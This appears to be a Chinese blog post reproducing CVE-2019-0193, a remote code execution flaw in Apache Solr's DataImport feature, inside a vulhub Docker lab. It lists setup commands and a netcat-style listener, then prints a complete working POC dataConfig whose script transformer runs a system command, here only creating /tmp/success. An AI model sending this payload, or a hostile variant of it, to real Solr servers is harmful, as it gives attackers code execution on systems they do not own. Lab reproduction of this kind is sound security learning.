Apache Solr rce复现(CVE-2019-0193)

Apache Solr rce复现(CVE-2019-0193)

  • 前言
  • 环境搭建
  • 漏洞复现
  • 参考文章

前言

影响版本
Apache Solr < 8.2.0

环境搭建

启动docker

systemctl start docker

获取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/solr/CVE-2019-0193/

启动容器

docker-compose up -d
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db # 创建名为“test”的Core,并开启dataimport

查看容器

docker ps

Apache Solr rce复现(CVE-2019-0193)_第1张图片

漏洞复现

centos启动监听

nv -lvvp 80

访问

http://192.168.164.162:8983/solr/#/

Apache Solr rce复现(CVE-2019-0193)_第2张图片
Apache Solr rce复现(CVE-2019-0193)_第3张图片
打开刚刚创建好的test核心,选择Dataimport功能并选择debug模式,填入以下POC

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

点击Execute with this Confuguration
查看生成文件

docker exec -it 939 /bin/bash
ls /tmp

Apache Solr rce复现(CVE-2019-0193)_第4张图片

参考文章

https://vulhub.org/#/environments/solr/CVE-2019-0193/
https://mp.weixin.qq.com/s/hCLEfDpXfDDWTTDd6vgtVA

你可能感兴趣的:(漏洞复现)